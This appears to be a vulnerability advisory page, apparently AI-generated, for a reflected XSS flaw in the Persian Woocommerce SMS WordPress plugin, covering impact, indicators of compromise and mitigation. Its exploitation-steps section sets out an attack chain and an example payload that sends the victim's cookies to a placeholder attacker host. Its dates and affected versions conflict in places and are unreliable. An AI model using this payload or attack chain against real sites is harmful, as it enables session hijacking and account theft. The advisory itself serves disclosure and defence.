CVE-2026-22352: 
WordPress vulnerability analysis and mitigation

Overview

CVE-2026-22352 is a Reflected Cross-Site Scripting (XSS) vulnerability in the Persian Woocommerce SMS WordPress plugin by PersianScript. It affects all versions up to and including 7.1.1 (also reported as affecting up to 7.2.0). The vulnerability was reported on November 30, 2025, and published on February 20, 2026, with no official patch available as of the disclosure date. It carries a CVSS v3.1 base score of 7.1 (Medium/High) (Patchstack, Feedly).

Technical details

The vulnerability is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation — Cross-Site Scripting), specifically of the reflected type. Insufficient sanitization of user-supplied input allows an attacker to inject malicious scripts into HTTP responses that are then reflected back to the victim's browser. Exploitation requires no authentication (unauthenticated attacker) but does require user interaction — typically tricking a privileged user into clicking a crafted malicious link. The attack vector is network-based with low attack complexity (Patchstack).

Impact

Successful exploitation allows an attacker to inject and execute arbitrary JavaScript in the context of a victim's browser session on the affected WordPress site. This can lead to session hijacking, credential theft, unauthorized administrative actions, defacement, or redirection of site visitors to malicious pages. The CVSS scope is marked as "Changed," indicating that the impact can extend beyond the vulnerable component to affect other resources such as the victim's browser environment (Patchstack).

Exploitability

No official patch is available, and Patchstack notes that vulnerabilities of this type are commonly used in mass-exploit campaigns targeting thousands of WordPress sites regardless of traffic size or popularity. The EPSS score is approximately 0.029% (0.000290), indicating a currently low but non-negligible probability of exploitation in the wild. There is no current evidence of active in-the-wild exploitation or threat actor attribution, and the vulnerability is not listed in the CISA KEV catalog (Patchstack, Feedly).

Exploitation steps

  1. Reconnaissance: Identify WordPress sites running the Persian Woocommerce SMS plugin version ≤ 7.1.1 (or ≤ 7.2.0) using tools like WPScan, Shodan, or Google dorks targeting plugin-specific file paths.
  2. Craft malicious URL: Construct a URL targeting the vulnerable plugin endpoint that includes an unsanitized parameter containing a reflected XSS payload (e.g., <script>document.location='https://attacker.com/steal?c='+document.cookie</script>).
  3. Deliver payload: Send the crafted URL to a target user — typically a WordPress administrator — via phishing email, social engineering, or a malicious link embedded in a forum or message.
  4. Victim interaction: When the victim (e.g., a logged-in admin) clicks the link, the malicious script is reflected by the server and executed in their browser.
  5. Achieve objective: The executed script can steal session cookies, perform actions on behalf of the admin (e.g., create rogue admin accounts), or redirect visitors to attacker-controlled infrastructure (Patchstack).

Indicators of compromise

  • Network: Unusual outbound requests from admin browsers to unknown external domains shortly after accessing WordPress admin pages; HTTP requests containing encoded JavaScript payloads (<script>, %3Cscript%3E, javascript:) in URL query parameters directed at the Persian Woocommerce SMS plugin endpoints.
  • Logs: WordPress or web server access logs showing GET/POST requests to plugin-related URLs with suspicious query string values containing HTML or JavaScript fragments; repeated requests from the same IP with varying XSS payloads (fuzzing behavior).
  • Process/Browser: Unexpected redirects or pop-ups experienced by admin users when navigating WordPress admin pages; new unauthorized admin accounts created without legitimate activity.

Mitigation and workarounds

No official patch from the plugin developer (PersianScript) is available as of the disclosure date. Patchstack has issued a virtual patching/mitigation rule for its subscribers to block exploitation attempts until an official fix is released. Site owners are advised to deactivate and remove the Persian Woocommerce SMS plugin until a patched version is available, or use a web application firewall (WAF) with XSS filtering rules. Hosting providers or web developers should be consulted if immediate action is not feasible (Patchstack).

Community reactions

The vulnerability was discovered and credited to researcher "Bonds" and published by Patchstack on February 11, 2026. Patchstack classifies it as medium priority and notes it is characteristic of vulnerabilities used in mass WordPress exploit campaigns. No significant broader media coverage or notable social media discussion has been identified beyond standard vulnerability database aggregation (Patchstack).

Additional resources


Source: This report was generated using AI

Related WordPress vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

CVE-2026-86850MEDIUM6.5
  • sku-error-fixer-for-woocommerce
NoNoOct 06, 2026
CVE-2026-88931MEDIUM5.3
  • social-web-suite
NoNoOct 06, 2026
CVE-2026-87841MEDIUM5.3
  • unitechpay-paiements-mobile-money
NoNoOct 06, 2026
CVE-2026-92990MEDIUM5.3
  • sendpress
NoNoOct 06, 2026
CVE-2026-92989MEDIUM4.3
  • sendpress
NoNoOct 06, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management